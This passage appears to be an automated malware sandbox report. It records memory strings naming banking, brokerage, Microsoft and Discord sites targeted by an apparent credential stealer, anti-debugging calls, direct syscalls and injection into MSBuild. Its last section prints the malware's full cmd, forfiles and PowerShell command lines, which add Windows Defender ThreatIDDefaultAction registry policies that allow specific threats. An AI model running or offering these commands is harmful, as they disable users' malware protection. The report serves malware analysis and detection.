Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Microsoft Hyper-V Server
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: QEMU_HARDU
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Standard without Hyper-V Full
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Enterprise without Hyper-V Core
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: run.exe, 00000048.00000002.2693112601.000000000335E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: http://www.vmware.com/0/
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: u2xs.3.exe, 0000000F.00000003.2648563677.0000000000CB8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000045.00000002.3259175365.000000000142C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: 6without Hyper-V for Windows Essential Server Solutions
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: i1.exe, 00000006.00000003.2342660108.00000000070C6000.00000004.00000020.00020000.00000000.sdmp, u2xs.3.exe, 0000000F.00000000.2324296887.000000000041C000.00000020.00000001.01000000.00000011.sdmp	Binary or memory string: Standard without Hyper-V Core
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: MSBuild.exe, 00000045.00000002.3279531997.00000000041D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: MSBuild.exe, 00000045.00000002.3265540539.0000000003654000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-3252
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-69096
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68060
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68063
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68078
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-67810
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68074
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68104
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	API call chain: ExitProcess graph end node	graph_8-68081
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

6_2_00409A73

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe

Code function: 11_2_00DCD15B VirtualProtect ?,-00000001,00000104,?,?,?,00000000

11_2_00DCD15B

Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe

8_2_00416240

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_004139E7 mov eax, dword ptr fs:[00000030h]	6_2_004139E7
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_04095C93 push dword ptr fs:[00000030h]	6_2_04095C93
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C90D90 mov eax, dword ptr fs:[00000030h]	6_2_05C90D90
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CA3C4E mov eax, dword ptr fs:[00000030h]	6_2_05CA3C4E
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9092B mov eax, dword ptr fs:[00000030h]	6_2_05C9092B
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00415DC0 mov eax, dword ptr fs:[00000030h]	8_2_00415DC0

Source: C:\Users\user\AppData\Local\Temp\i1.exe

Code function: 6_2_00420AEA GetProcessHeap,

6_2_00420AEA

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_00409A73
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00409C06 SetUnhandledExceptionFilter,	6_2_00409C06
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00409EBE
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0041073B
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C99CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_05C99CDA
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C99E6D SetUnhandledExceptionFilter,	6_2_05C99E6D
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05CA09A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_05CA09A2
Source: C:\Users\user\AppData\Local\Temp\i1.exe	Code function: 6_2_05C9A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_05C9A125
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00419DC7 SetUnhandledExceptionFilter,	8_2_00419DC7
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00417B4E
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_004173DD
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C4B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_68C4B1F7
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68C4B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_68C4B66C
Source: C:\Users\user\AppData\Local\Temp\u2xs.0.exe	Code function: 8_2_68DFAC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_68DFAC62
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00DCC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00DCC1FD
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_00DD6678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_00DD6678
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC90E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	11_2_68BC90E9
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Code function: 11_2_68BC2782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_68BC2782

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\System32\svchost.exe

File created: BIT157D.tmp.20.dr

Jump to dropped file

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	NtQuerySystemInformation: Direct from: 0xCC5BE4
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	NtProtectVirtualMemory: Direct from: 0x76EE7B2E
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	NtSetInformationThread: Direct from: 0x68AD617C
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	NtSetInformationThread: Direct from: 0x6858617C

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
Source: C:\Users\user\AppData\Local\Temp\u2xs.2\run.exe	Section loaded: NULL target: unknown protection: read write

Modifies Windows Defender protection settings

Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\reg.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\forfiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\"
Source: C:\Users\user\AppData\Local\Temp\7zS5A79.tmp\Install.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\forfiles.exe forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
